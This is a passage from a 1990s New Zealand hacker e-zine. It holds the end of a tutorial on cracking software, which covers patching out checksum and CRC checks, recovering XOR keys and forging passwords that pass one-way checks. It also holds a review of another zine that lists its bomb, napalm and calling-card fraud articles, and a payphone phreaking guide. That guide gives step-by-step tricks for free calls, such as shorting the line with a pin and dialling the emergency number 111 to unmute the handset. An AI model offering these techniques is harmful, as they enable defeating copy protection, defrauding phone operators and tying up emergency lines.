the code. THERE WILL (almost) ALWAYS BE A COMPARE after any sort of
|
|
checksum, wether it be a simple addition, or a complicated CRC. This
|
|
compare will then have a conditional statement - this is the crux of it.
|
|
All you do is remove the conditional and cover it with a constant - if it
|
|
is supposed to branch if a certain value, make it branch always. If it
|
|
branches only if NOT a certain value, make it a do-nothing set of
|
|
instructions. Sometimes there will be more than one check of the value, so
|
|
you must find all of them.
|
|
|
|
I feel I may have just skipped a vital idea. We changed the conditional
|
|
rather than the compare value because we want all future attempts at this
|
|
routine to be correct. This may be easier illustrated in, for example, a
|
|
trainer mode for a game. It is better to make UNLIMITED lives by removing
|
|
the conditional, than to have 9999999 lives - because you can still die.
|
|
Also it is a lot easier to change back to it's original form if you stuff
|
|
up, because you only need write down the opcodes, not the constant.
|
|
|
|
Now you have just gotten around a check in the program. There may be more,
|
|
and they may be hidden. So just test your program for full functionality.
|
|
Insert your original alteration, and test again. If you still have
|
|
problems, try this again. There could be multiple checks, checks on
|
|
checks, and all sorts of stuff.
|
|
|
|
You will notice now that the "difference" between your original program
|
|
and the altered one will only be a few key bytes. However it is how these
|
|
key bytes are placed that is important.
|
|
|
|
This is only one skill of many you will pick up as a hacker / cracker, but
|
|
one of the most used.
|
|
|
|
And now to make this entire section useless, I shall tell you how to get
|
|
around this type of hacking / cracking when you are on the programming end.
|
|
MAKE YOUR CHECK VARIABLES DO SOMETHING. If you calculate the CRC or some
|
|
vital code, don't just compare it, use it as a relative pointer into a data
|
|
segment. If the CRC is wrong, your system crashes. It's best to not even
|
|
COMPARE it, as this means you have the correct value sitting there. Just
|
|
assume it is right, and have the checksum or CRC or whatever in your
|
|
initialization code, but don't use it till much later on. This way your
|
|
hacker will likely give up.
|
|
|
|
And to make that useless - how to crack programs that use this technique
|
|
(gee, get the feeling every crack leads to a fix, and every fix leads to a
|
|
crack?). Just debug the program, figure out the correct value for the CRC
|
|
or whatever, and hard-code that in! Wipe over the CRC routine with one
|
|
that sets any variables it was supposed to correctly. Chances are it will
|
|
take up less space anyway!
|
|
|
|
So, we have done "actually changing a program" from the point of view of
|
|
making it run with changes. Now I shall cover (very basically) encryption
|
|
and decryption.
|
|
|
|
Encryption is mostly used to keep things from prying eyes. Which is
|
|
exactly what makes me want to break it. A program might have it's
|
|
datafiles stored encrypted to stop you getting unfair hints, or it might
|
|
have some of it's code encrypted that does some magical copy protection.
|
|
|
|
Essential to the breaking of codes with reference to programs, is that any
|
|
program has all the code necessary to decrypt it's data. PGP has all it's
|
|
code there in source form, what could be easier. However, this is where
|
|
the first problem starts - the KEY. If you know the key, you really dont
|
|
need to be reading this. If you don't know the key, you have to break the
|
|
algorithm. This is where it gets hard. PGP is more or less unbreakable,
|
|
because it uses a complicated algorithm and a complex and constantly
|
|
changing key (different for each person).
|
|
|
|
However most programs use only 1 key, and that is usually stored within
|
|
the program itself. The simplest of routines is that you get all your
|
|
data, and logically NOT it, ie all 1's become 0's and all 0's become 1's.
|
|
For this simple system, the algorithm IS the key. All you do is reverse
|
|
the algorithm, ie run it over again, and out comes your data.
|
|
|
|
Another logical operator, Exclusive-OR (sometimes refered to as EOR or
|
|
XOR), is commonly used. This is easiest thought of as a "selective not" -
|
|
where each bit in the "key" (source) says wether each bit in the
|
|
destination should be "NOT"'d. If the key bit is a 1, it is. So a key of
|
|
1010 and a dest of 1001 would become 0011. This also is also a reversible
|
|
algorithm, so all you do is run it over again. EOR has the advantage as a
|
|
algorithm with a "key" component. The KEY can be difficult to guess,
|
|
especially if it is more than 1 byte. However there are ways to get around
|
|
it. First, see if the program uses a fixed key - ie debug / disassemble it
|
|
and see. If so, there you have it. A little playing around and you have
|
|
your data.
|
|
|
|
This brings me to the next main point of this article - finding the EOR key
|
|
if you don't have one. This is actually really easy - all you need to do
|
|
is know some of the data that is after the EOR, and the length of the Key.
|
|
The length of the key can usually be determined from the algorithm, if it
|
|
is a continuous loop of EOR'ing a byte with some data, the key is a byte.
|
|
If it is going through a reference table (and you can't just dig this table
|
|
up) then you have to figure out how long it is. You also need to know at
|
|
least one keylength of decrypted data.
|
|
|
|
What you do is rely on the fact that 1010 EOR 1001 = 0011 and also 0011 EOR
|
|
1001 = 1010 - in other words, the key acting on the cypher yields the data,
|
|
and the data acting on the cypher yields the key! So all you do is write a
|
|
small program that gets your data, and eor's it with the cypher, and you
|
|
have the key. You can also build a key from some fragments of data by
|
|
guessing what the data in between might be - if this is text, it is usually
|
|
easy. Now you apply your key to the rest of the data. Simple!
|
|
|
|
However one problem is that you usually don't know where abouts in the
|
|
cypher your data comes from - so the solution is to write a program that
|
|
uses the data in every possible position in the cypher to yield every
|
|
possible key, and then use that key on every piece of cypher, and see what
|
|
comes out. This may take a while, and you need to be able to recognize the
|
|
data in it's correct form, easy if it's text, otherwise difficult.
|
|
|
|
Other common forms of encryption are addition / subtraction of constant or
|
|
changing values, rotation of bits (either in byte, word, or larger blocks),
|
|
and swapping blocks of data (be they bits, bytes or larger blocks). The
|
|
important thing to remember is that the program itself has to be able to
|
|
decrypt the data, so with enough care and patience you can find that bit
|
|
and copy it. Remember also that there can be more than one level of
|
|
encryption, and different sets of algorithms for different blocks of data.
|
|
|
|
The final thing I wish to deal with is the topic of "One Way Encryption" -
|
|
it is used sometimes to create keys for the above checks and decryption.
|
|
|
|
It is also useful if you can break the algorithm to make an automatic
|
|
password generator for encrypted files from a given program...
|
|
|
|
This situation is actually very common. It is a real pain. However, you
|
|
spot an algorithm that creates the key, possible from a password! Now,
|
|
somehow a password of any length is "shrunk" or "expanded" to fit a given
|
|
key length, and this is used to decrypt the data. This is called "One Way"
|
|
encryption, and is commonly used on passwords. The key created has little
|
|
bearing to the original password, and can't be recovered because there is
|
|
usually a "loss of significance" of data.
|
|
|
|
The simplest way to explain is to use the simplest one-way algorithm. Just
|
|
add all the bytes of a string together, in a byte. This way you are bound
|
|
to get overflow, rendering some data lost. However you end up with a byte
|
|
to use, and it will be a byte regardless of the length of the password.
|
|
So, if you can't get the password back, how do you pass the test? Simple -
|
|
you create a "garbageword". This is something that is functionally the
|
|
same as the password, but not actually the password. It is gained by
|
|
reversing the algorithm given the result.
|
|
|
|
In this simple algorithm all you do is get your byte key, and subtract as
|
|
many "A"'s as possible from it. Say your key was hex $BC (which
|
|
incedentially is the byte sum of the letters 'keys'. You can subtract 'A'
|
|
(hex $41) from it 2 times, leaving hex $3A, which is ':' which may not be
|
|
liked by our algorithm if it only takes text, so we find how much we have
|
|
to TAKE OFF it to get a letter or number. The closest number is '9' just
|
|
below it, so we use that, and add the extra 1 to one of the 'A's.
|
|
Therefore our garbageword is now 'AB9' - this is functionally the same as
|
|
'keys' for this algorithm, and so we have broken the lock.
|
|
|
|
You will hardly ever get an algorithm as simple as this one, but _ANY_ one
|
|
way encryption can be made to yeild a garbageword given the key if you
|
|
devote enough time to it.
|
|
|
|
And how do you stop this sort of breaking of your algorithms? Easy - make
|
|
it so complex that a hacker will never want to break it. - remember your
|
|
algorithm will always yeild the same key with the same input, so you don't
|
|
have to understand what you have written, you just need to check that it
|
|
makes different keys.
|
|
|
|
For example, try to break one that rotates a 2-byte key sotrage by the
|
|
lowest 4 bits of a letter to the right, then adds the letter, then rotates
|
|
left by the upper 4 bits, and EOR's the letter. This is not actually
|
|
_THAT_ hard to create a reverse algorithm for, it is just very hard to
|
|
create a printable garbageword. And as long as you make your entry of the
|
|
password only take printable letters, it will be hard to beat. And you
|
|
have a 1 in 65535 chance of fluking it. But by using a slightly more
|
|
complicated algorithm and 4 bytes of data, you would have a 1 in 4294967294
|
|
chance.
|
|
|
|
And an even "trickier" one to break is the algorithm in PowerPacker
|
|
encrypted executable files. Nico has thought it out well. You type in a
|
|
password, and it calcuates a word to compare and tell you if the password
|
|
is valid, but uses a totally separate algorithm to generate a longword for
|
|
the actual decryption key - so any garbageword you make from the compare
|
|
word is only going to have a 1 in 65535 change of being correct... Makes
|
|
things a little difficult , eh? And to make it harder the only encrypted
|
|
stuff is the actual crunched data - which seems to be crunched differently
|
|
than with no password as well, so I can't think of any way, short of formal
|
|
cryptanalasys, to get around it.
|
|
|
|
Well, that's about it from me, bit this is only the tip of the iceberg of
|
|
what there is to learn before you are even a half-competent hacker in these
|
|
here parts... But they are 3 important things that will lead to much more.
|
|
|
|
* Data wants to be free - so help it out *
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ Review: 'ToT' ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
|
|
REVIEW: 'Tricks of the Trade' [ToT]
|
|
|
|
|
|
This is the first review that we will be including in the SLi Magazine, but
|
|
we hope to expand to reviewing a few others in the future.
|
|
|
|
|
|
[PLEASE NOTE: This is a critical review. Some have said it has been a little
|
|
too critical, perhaps that is the case, but the decision is to
|
|
be left to you, the reader.]
|
|
|
|
|
|
|
|
[BRIEFING]
|
|
|
|
|
|
WHAT? Electronic Magazine.
|
|
|
|
WHO? Distributed by: Raider.
|
|
Content by : Hype, Red Lion, Mutant-X, GreyRat, Nick,
|
|
Demogordon, X-Treme and Kevin.
|
|
|
|
WHEN? 24th December 1994
|
|
|
|
WHERE? Written by a group of Wellington H/P/A's. Perhaps a couple
|
|
of members out of the Wellington region seeming that at
|
|
present I am unable to pin-point the locations and identities
|
|
of a couple of the 'ToT' writers.
|
|
|
|
WHY? This question stumped me for a while as I can only give my
|
|
opinion. I came up with the following - a) for the pure
|
|
reason to educate others coming up in the H/P/A scene,
|
|
b) to give 'SLi' a taste of competition (this could be fun!)
|
|
or maybe even, c) to get a bit of the limelight.
|
|
These are in order of my suspicions from 'A' being the most
|
|
likely, to 'C' being the least likely.
|
|
|
|
HOW? Thought it was pretty damn obvious, but for those of you who
|
|
are interested... They got each of the writers to write their
|
|
articles down on paper then gave them to the editor to type out
|
|
on his dinky li'l 'puter...
|
|
|
|
[Editors Note: This seems to be the most TIME wasting story
|
|
I've EVER heard BUT that's what they did, so
|
|
'Raider' said. ]
|
|
|
|
|
|
|
|
[CRITICAL REVIEW]
|
|
|
|
|
|
This magazine isn't too bad for the first couple of issues, but admittably,
|
|
the first issue had a little more to be desired.
|
|
The idea of there being a variety is 'okay', but that depends on the indi-
|
|
viduals of which the magazine was/is designed for.
|
|
|
|
In my opinion, it appears that 'ToT' is designed with the lesser educated
|
|
in the H/P/A scene in mind. There were quite a number of articles in the
|
|
second issue of 'ToT' in comparison to any of the 'SLi' issues, but the
|
|
articles in 'ToT' were fairly brief and the ideas were a little out-dated.
|
|
|
|
It appears that 'ToT' is still in the process of deciding where it wants to
|
|
go - it would've been a better idea if plans had been made earlier and those
|
|
decisions would've made the foundation to start off with. With 'SLi', all
|
|
the needy decisions had been made PRIOR to even STARTING the magazine.
|
|
'SLi' was a group of companions FAR before it was a magazine - It's ad-
|
|
viable to know who's going to be there when you need them and whether they
|
|
can be trusted or not. The only way you can find out is by experimentation.
|
|
And that's what we did.
|
|
|
|
Anyway, going back to 'ToT' and it's purpose in the H/P/A scene...
|
|
After a good read throughout the magazine, I noticed that there is a fair
|
|
deal of information dealing with the Australian telephone network. It may
|
|
do a good job there, but WHO are the main people who are most probably
|
|
going to make use of the information stored within the bits and bytes?
|
|
I may be wrong, but I would say it would be us 'kiwi H/P/A's' who would
|
|
benefit most from the information. It looks as though 'ToT' is in too
|
|
much of a hurry to be known widespread - 'slow and steady wins the race'
|
|
would be a good phrase to put there.
|
|
|
|
|
|
Following is an 'article-by-article review' of 'ToT#2':
|
|
|
|
[REVIEW]
|
|
|
|
[Articles One-Three: Clickers]
|
|
|
|
Clickers. I haven't known of one which has worked yet, but that might just
|
|
be that those of whom have used them had not used them correctly. Strange
|
|
that they hadn't managed to work for about four people, but I guess you'll
|
|
just have to try them out for yourself considering that I haven't tried
|
|
them out myself.
|
|
|
|
At least you'll get your own BBQ lighter... Pretty sure that they'd make a
|
|
pretty good shock device - could be used as a stun gun if they're what I
|
|
think they are.
|
|
|
|
|
|
[Article Four: Travel Sickness]
|
|
|
|
The only flaw I could be sure on commenting on, is the lack of information
|
|
on what they [the tablets] actually do to the human body and whether or
|
|
not they're safe (or at least not lethal).
|
|
|
|
If ideas like this one are printed without thought to any consequences they
|
|
may have, we may find that a lot of people may suffer injuries due to the
|
|
lack of information given to the reader. Mind you, if you're silly enough
|
|
to try something without attempting to find out about it beforehand, then
|
|
you hold as much responsibility as the person responsible for the printing
|
|
of the information given.
|
|
|
|
|
|
[Article Five: Busted???]
|
|
|
|
Well, I guess I have no problems at all with this article. This is an art-
|
|
icle providing information to the reader which does not prompt for any
|
|
further action.
|
|
|
|
|
|
[Article Six: Credit Card Calling]
|
|
|
|
I had just recently covered this in the 'SLi#3' before I had any knowledge
|
|
of this article at all - it covered basically the same aspects but I'd tried
|
|
to explain it a little more to make sure it was understood better, but this
|
|
article is nonetheless okay, even if I disagree with some of the hints to a
|
|
certain degree. Still, a good article.
|
|
|
|
|
|
[Article Seven: Nut n Bolt Bomb]
|
|
|
|
It's already well-known that match heads contain explosive chemicals, but
|
|
I think that the writer of this article COULD have at least pointed out how
|
|
dangerous this can be - what with the flying shrapnel and the explosiveness
|
|
of the match head mixture. I was dismayed at the fact that I couldn't spot
|
|
a single safety warning right throughout the entire magazine at all.
|
|
|
|
[Note: This has already been covered in a few other mags prior to this one,
|
|
ie. early editions of Phrack among others.]
|
|
|
|
|
|
[Article Eight: Hacking Calling Cardz]
|
|
|
|
The article was a little vague, but (because of previous experiences with
|
|
this scenario) I could see what they were trying to explain. I find that
|
|
if you're more polite, you get what you want quicker instead of having to
|
|
bumble around with other unnecessary situations - no one likes a pushy
|
|
operator, so you can imagine how the victims would feel!
|
|
|
|
|
|
[Article Nine: One for the Neighbourz]
|
|
|
|
Well... I don't really have a comment on this one - read it for yourself..
|
|
I'm kind of, uh, "speachless". =)
|
|
|
|
|
|
[Article Ten: Hot Air Balloon]
|
|
|
|
A nicely presented article. I don't think I'd bother trying to build one
|
|
though considering I'd find it a fire-hazard if put together wrong and the
|
|
chances are, I'd do it wrong. Still, worth a try if you're into this sort
|
|
of thing and are competent in doing so. =)
|
|
|
|
|
|
[Article Eleven: Hidenburg Balloon]
|
|
|
|
This is just your basic acid-base explosion when you bring a naked flame
|
|
to Hydrogen[?]. A nice little bang, but watch for flying pieces of glass if
|
|
there are any - should be careful.
|
|
|
|
|
|
[Article Twelve: Hintz n Tipz for Pot Planting]
|
|
|
|
A nice little article on (as it says in the title) hints and tips for the
|
|
planting of marijuana plants. Not bad.. not bad at all. Even if originally
|
|
posted on "Bad Sector BBS" and then (with the writer's permission, of course)
|
|
transferred to the magazine - at least it's making use of your resources. =)
|
|
|
|
|
|
[Article Thirteen: How to Pass a Lie Detector Test]
|
|
|
|
A very entertaining article.. What can I say? I enjoyed reading it.
|
|
... But WHERE are you going to have to fake a lie detector test. If you're
|
|
foolish enuff to get caught, you can guarantee they have enough on you and
|
|
they WONT need you to confirm or deny it. Well, I guess if you're being in-
|
|
terrogated about certain activities concerning friends, this could be handy.
|
|
Still, a good read - you never know when you might need it.
|
|
|
|
|
|
[Article Fourteen: Just 4 Fun]
|
|
|
|
Uh, short. Very short in fact. A space filler?
|
|
|
|
|
|
[Article Fifteen: Corn Bombs]
|
|
|
|
A simple, no nonsense bomb.
|
|
|
|
|
|
[Article Sixteen: Fucking up a BBS]
|
|
|
|
Old concept. Has been brought up in MANY different places, magazines,
|
|
person-to-person chats, etc... Simple commonsense really. Telecom seems
|
|
to be tightening up the security of other peoples services - about time
|
|
they'd wised up to the old trick!
|
|
|
|
|
|
[Article Seventeen: Hacking CityNet/Genie]
|
|
|
|
The first part showed potential for something not to laugh at, although,
|
|
it was an old trick and many people had already been aware of the fact that
|
|
it was something done quite often. But, why bother when you can just walk
|
|
in and make your own account? Even one with a fake name. All you need to
|
|
do is simply USE YOUR COMMONSENSE. As for the hacking of CityNet/Genie
|
|
passwords with the user's names, you can't guarantee that it's going to
|
|
work. Is it really worth the trouble? Are you going to bother finding out
|
|
EVERY SINGLE USER NAME on the system and sit there trying them all day/night?
|
|
I guess you could spend a couple of minutes/hours/days writing a proggy/shell
|
|
script to do it for you, but I wouldn't want to tie my phoneline up!
|
|
The service is free, so isn't that enough?
|
|
|
|
|
|
[Article Eighteen: Strange Auzzie Numberz]
|
|
|
|
So, how many people out there, who've read this article, are going to fly,
|
|
float, swim, etc... to Australia? This is of no use to you if you're not
|
|
planning on visiting them within this half-decade or so. The chances of
|
|
any flaws, from today still being around by that time are pretty slim due to
|
|
the technology boom that should occur in the next few years. Although, this
|
|
is useful if you have friends/associates living in Aussie who you like to
|
|
keep in contact with.
|
|
|
|
|
|
[Article Nineteen: Hackerz Hit Telecom]
|
|
|
|
Yet another article dealing with the land mass north-west of New Zealand.
|
|
The article was okay for light reading, but was of little interest to my-
|
|
self. Similar to 'Article Five: Busted???' in that it is a "media reported"
|
|
incident.
|
|
|
|
|
|
[Article Twenty: 008 Diverter]
|
|
|
|
Refer to [Article Eighteen: Strange Auzzie Numberz].
|
|
|
|
|
|
[Article Twenty-One: Eureka]
|
|
|
|
One word: Childish...
|
|
Oh, and a couple more:
|
|
|
|
... next please...
|
|
|
|
|
|
[Article Twenty-Two: Making Napalm]
|
|
|
|
I highly disliked the example of a cat being used and I have already voiced
|
|
my opinion on this to 'Raider'. I'm not too sure whether they [the writers]
|
|
realize the effects of their ideas seeming that there are going to be those
|
|
people/kids around who will try ANYthing for the sheer sake of it. Other
|
|
than the use of the cat in the article, there isn't too much more I'd comment
|
|
on. Interesting mixture - could be useful...... somewhere.. =)
|
|
|
|
|
|
[Article Twenty-Three: 10 Metre Cigarette Lighter]
|
|
|
|
The 'cigarette lighter' trick seems okay, the sugar/flour idea is an ancient
|
|
idea created 'decades' ago. As for the petrol soaked rags, I don't think
|
|
there are many people who are planning on trying to KILL the 'victim' - at
|
|
least I'd like to think not.
|
|
|
|
|
|
[Article Twenty-Four: Exploding Rockz]
|
|
|
|
Could be sore. How do you feel about 'hail'? =)
|
|
|
|
|
|
[Article Twenty-Five: How to Cure a Hangover]
|
|
|
|
Interesting tips. I'll keep them in mind if I need them!
|
|
Oh, another tip for how to cure a hangover - so I was informed - just eat a
|
|
lemon. I know it would surely bring ME down to earth pretty quickly!
|
|
|
|
|
|
[Article Twenty-Six: Coca-Cola Recipe]
|
|
|
|
Is it really worth the trouble when, in some places, you can get 500ml
|
|
worth for a single dollar? What if you stuff up? You end up with a large
|
|
amount of worthless goo - mind you, you could try selling it to the city
|
|
council to use as TAR. *grin*
|
|
|
|
[Editors Note: Also, Coca, or the leaf of the coca plant, [Cocaine] would
|
|
be a LOT harder to find at the local supermarket.]
|
|
|
|
|
|
[Article Twenty-Seven: Voodoo Magic]
|
|
|
|
Each to one's own. If you believe it, go for it, I guess.
|
|
|
|
|
|
[Article Twenty-Eight: Excusez for Missing Class]
|
|
|
|
Lacked information on the consequences of truancy, and take it from someone
|
|
who's knowledgeable of these acts. It's just not worth it. As for the cheat-
|
|
ing in exams - What if you're caught? You may as well forget about getting
|
|
a job you'll enjoy - you'll be stuck with cleaning floors and packing
|
|
burgers, fries and Coke. Sounds fun, don't it?
|
|
|
|
[Editor's Note: Or making Coke!]
|
|
|
|
|
|
[Article Twenty-Nine: Greetz and Msgz to Contactz]
|
|
|
|
The title says it all... Couldn't find anything wrong with it. =)
|
|
|
|
|
|
[Article Thirty: ToT - The Future?]
|
|
|
|
Interesting reading. 'Know thine enemy'. Hehe, nah, I don't think it would
|
|
come to that, but just to be on the safe side... *manical grin* *wink*
|
|
|
|
|
|
[Article Thirty-One: Last Wordz]
|
|
|
|
Normally skipped by the reader, but worth a read anyway.
|
|
|
|
|
|
[FINAL ANALISYS]
|
|
|
|
Some of the ideas expressed in 'ToT#2' had already been 'spread about'
|
|
prior to the release of 'ToT Magazine #2', so repeating the ideas wouldn't
|
|
have made much impact - especially if a lot of people know about them
|
|
already. If anything, it's a waste of disk space (j/k!). Some of the art-
|
|
icles, I found rather childish and others a little dangerous - not to mention
|
|
a lack of warnings which was one of my main concerns (it was something we'd
|
|
also forgot about in our previous mags, but you wise up after chats with
|
|
Telecom/other authorities!).
|
|
|
|
As far as I'm concerned, I'd rate this magazine as a 7/10 (I haven't yet come
|
|
across a 10 yet, so consider me to be a hard marker.. ;) ). The magazine
|
|
on the whole was 'nice light reading' seeming that the articles are, on
|
|
average, between a third of a page and a page, in length. Not a bad try
|
|
for a local Wellington H/P/A group really seeming that they had at least
|
|
SOMEthing to say. If you've got a small attention span, and are new to the
|
|
H/P/A scene, then this is the magazine for you.
|
|
|
|
I found it to be of no practical use to me, but it may do for you - it depends
|
|
on WHAT you're actually looking for. You don't have to take my word for it -
|
|
Why not just grab a copy and read it for y'self?
|
|
|
|
Finally, I'd just like to say - Quality, not Quantity is the key to success
|
|
with a good magazine. Maybe if the editor was interested less in the latter,
|
|
and more in the prior, it may show promise.
|
|
|
|
Many electronic magazines don't start out the best - due to lack of organ-
|
|
isation - but they normally get sorted out by about their third issue if
|
|
you're really serious about it.
|
|
|
|
|
|
[NOTES]
|
|
|
|
We, at SLi, welcome ANY comments at all and thoughts of setting up a
|
|
'Letters to the Editors' section in the magazine are in the process of being
|
|
thought over. Letters will, or will not, be printed depending on whether
|
|
it's wanted or not - in respective order.
|
|
|
|
We can be reached at:
|
|
|
|
NOTE: All Internet addresses at the moment are on hold _DO_NOT_ e-mail us
|
|
at _ANY_ of our previous e-mail addresses.
|
|
|
|
|
|
This email address works at the time of publication:
|
|
|
|
hacker_m@ix.wcc.govt.nz
|
|
|
|
|
|
Snail Mail:
|
|
|
|
SLi
|
|
PO Box 3030
|
|
Onekawa
|
|
Napier
|
|
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ SLi ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
In this part of the mag, WE [the guys and gals of SLi] tell ya what the group
|
|
is doing.
|
|
|
|
|
|
WHAT IS SLi? and WHAT WE STAND FOR:
|
|
|
|
Freedom and the right to publish our views and the RIGHT to TEACH _YOU_
|
|
what we know. Read the article "Honour" if you want to see what rules
|
|
we TRY to live by.
|
|
|
|
|
|
Members resigned by choice from SLi:
|
|
|
|
Digital Omega -- Quit due to personal reasons.
|
|
|
|
|
|
Telco: Well CyntaxEra's "misuse of a telephone" ooops has sorted
|
|
itself out...
|
|
|
|
|
|
BBS: Is finally UP AND running, but VERY private. It's located in
|
|
Wellington, New Zealand.
|
|
Email hacker_m@ix.wcc.govt.nz for information on the number and
|
|
other miscellaneous info.
|
|
|
|
|
|
|
|
OFFICIAL SLi BBS's
|
|
~~~~~~~~~~~~~~~~~~
|
|
(ie. run by SLi MEMBERS)
|
|
|
|
|
|
BBS NAME MEMBER PHONE NUMBER/S SPEED MODEM
|
|
|
|
Hacker's Haven BBS Thorium +64-6-844-DATA(+646 844 3282) 28.8k BPS *
|
|
SLi BBS Eon +64-4-475-SCAN(+644 475 XXXX) 14.4k BPS !?
|
|
|
|
|
|
* = Only online sometimes.
|
|
! = No K0d3z kiddies and NO Warez Puppies!! :)
|
|
? = Age limit of 17+. All files checked. UNIX system. 79Meg+ H/P/V
|
|
files. NO Anarchy, NO Porn, NO Codez and NO Warez permitted on system!
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ COCOT Phreaking ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
COCOT Phreaking
|
|
~~~~~~~~~~~~~~~
|
|
|
|
For those of you who are reading this article without any previous knowledge
|
|
of the common everyday COCOT, I'll begin by giving you a brief outline of this
|
|
wonderfully strange object... [insert 'The Twilight Zone' movie soundtrack
|
|
here]
|
|
|
|
C ustomer
|
|
O wned
|
|
C oin
|
|
O perated
|
|
T elephone.
|
|
|
|
There. Nothing to it. It's one of those small telephones you find in the old
|
|
shopping mall - in most cases, if there happens to be a 'Telecom Card/Coin
|
|
Phone' within a 3-metre radius, the chances of there being one around greatly
|
|
decreases - or your handy service station. In the case of the latter suggest-
|
|
ion, there'll almost always be an attendant keeping an eye out on you, but if
|
|
they're slightly busy, they'll most probably be keeping there eyes out for
|
|
other things.
|
|
|
|
[Note: Telecom does know of the shortfalls of these fones, and warns their
|
|
"clients" of the problems these fones have. So the attendants MIGHT
|
|
know what's wrong with his/her fone and keep an eye out.]
|
|
|
|
In the following, I'll just go over my 'observations' of these fones, and at-
|
|
tempt to explain a bit about how they work - well, as far as I'm aware of, any-
|
|
way.
|
|
|
|
[Note: Considering the fact that New Zealand doesn't have the same 'Freedom of
|
|
Speech' Act, as there is in the States, I'm a little wary of writing
|
|
this article, so I'll try and keep the ideas to a minimum - that's all
|
|
they are... ideas.]
|
|
|
|
|
|
[Type One]
|
|
|
|
Description: 'Blue-Buttoned Telephone'.
|
|
|
|
[NOTE: If you try 'Idea One' you may be able to use any 'Blue-Buttoned' fone,
|
|
but, if you are trying 'Idea Two', you must use the particular type
|
|
which is listed below.]
|
|
|
|
LCD Display shows a blinking 'COIN' which takes up the entire LCD display.
|
|
When dialling, it doesn't bring up the number onto the display, but you
|
|
SHOULD be able to hear it dialling.
|
|
|
|
Major Colours: Blue, white, grey and black.
|
|
|
|
|
|
[Idea One]
|
|
|
|
Get a pin. Dial the number you want to call, push the pin through the wire,
|
|
running from the fone into the wall, so it shorts the wires together thus
|
|
making it impossible for the fone to disconnect. Hang up the fone and pick
|
|
it back up. Dial '111' and pull the pin out. There you go - a free call.
|
|
|
|
[Idea Two]
|
|
|
|
Pick up the receiver and dial the number you want - as though you would nor-
|
|
mally. It should dial the number for you, and if the line isn't busy, you
|
|
should be put through okay. Once the person answers, dial '111' and it should
|
|
free you from the mute - allowing you to speak freely with the person you have
|
|
just called. If you get a 'no-such-number' answer, then perhaps there is a
|
|
toll-bar on the phone line of the COCOT, otherwise, try another COCOT.
|
|
|
|
|
|
[Explanation]
|
|
|
|
With these 'blue-buttoned fones', you get your dial-tone and you're even per-
|
|
mitted to use the keypad. The only problem... the microphone. The micro-
|
|
phone is muted to stop the person from using the telephone and (from what I'm
|
|
aware of) can only be 'de-muted' by the user of the telephone inserting a
|
|
coin, OR dialling '111' [the emergency phone number in NZ - for those of you
|
|
who are unfamiliar with the number].
|
|
|
|
After the numbers '111' are dialled - regardless of wether the phone has a
|
|
dial-tone, or not - the microphone loses the 'mute button', and allows the
|
|
user of the fone to speak into the microphone whilst allowing the receiver
|
|
of the call to hear the caller. Of course, the receiver of the phone is un-
|
|
changed, which allows the caller to hear the recipient of the call, to allow
|
|
the caller to hear the dial-tone.
|
|
|
|
|
|
[Type Two]
|
|
|
|
Description: 'Brown-Buttoned Telephone'
|
|
|
|
[NOTE: They have a big orange button with an 'A' on it.]
|
|
|
|
These fones are becoming less common, but are still around. They have been
|
|
replaced by either the 'blue-buttoned fone' or have an annoying 'beep' add-
|
|
ed especially to help us fone phreaks out (NOT!). A few times, I have come
|
|
across the odd one or two which have an interrupted dial-tone - a fake one
|
|
which sticks around until you drop your dandy coin into the coin slot.
|
|
|
|
Major Colours: Brown, orange, white and traces of black.
|
|
|
|
[Idea One]
|
|
|
|
Attain yourself a DTMF dialler and wander off to your nearest 'brown buttoned
|
|
telephone'. Just put the dialler's microphone up to the UN-MUTED microphone
|
|
on the telephone's receiver, and dial away. Once the person answers, begin to
|
|
talk. =)
|
|
|
|
[Explanation]
|
|
|
|
The coin's only use appears to be to give the caller access to the dialling
|
|
pad. Well, the older versions seem to give that appearance - seeming that
|
|
there are newer versions hanging about with similar problems (ie. the false
|
|
dial-tone). The outer casing (the telephone case) is the same and the only
|
|
way to tell the difference is to try things out for yourself. This is a case
|
|
of just hoping that you're lucky enough to find the ones which work.
|
|
|
|
|
|
[Type Three]
|
|
|
|
Description: 'The Red Phone'
|
|
|
|
These are these rather big, rather OLD, rather chunky, rather, err, well,
|
|
RED fones. they have a little red button on them that automatically dials
|
|
'111'.
|
|
|
|
Major Colours: Uh, a kinda RED colour. Has traces of white on the keypad for
|
|
the numbers.
|
|
|
|
[Idea One]
|
|
|
|
The keypad is the only thing not connected so the ol' DTMF trick will work
|
|
fine. They seem to be in a lot of T.A.B.'s [horse betting places for those of
|
|
you who don't know that already]. Simple, aint it?
|
|
|
|
[Idea Two]
|
|
|
|
I assume you can also pulse dial using the switch-hook.
|
|
|
|
For those who don't know how to use pulse-dialling, just tap the switch-hook
|
|
down for a 'split-second' the number of times you need to dial the number with
|
|
a space of silence between each number (so it knows when the next number is
|
|
being dialled). It is a VERY old trick, but I thought I'd add it for those
|
|
interested.
|
|
|
|
[NOTE: These apply to NZ, but I can't remember what they are everywhere else
|
|
and plus, I'm not going to type down ALL of the respective numbers!]
|
|
|
|
|
|
Phone Number Number of times
|
|
to press s-h
|
|
|
|
0 - 10
|
|
1 - 9
|
|
2 - 8
|
|
3 - 7
|
|
4 - 6
|
|
5 - 5
|
|
6 - 4
|
|
7 - 3
|
|
8 - 2
|
|
9 - 1
|
|
|
|
ie. Say you want to dial, 001-202-542-873, you would do this:
|
|
|
|
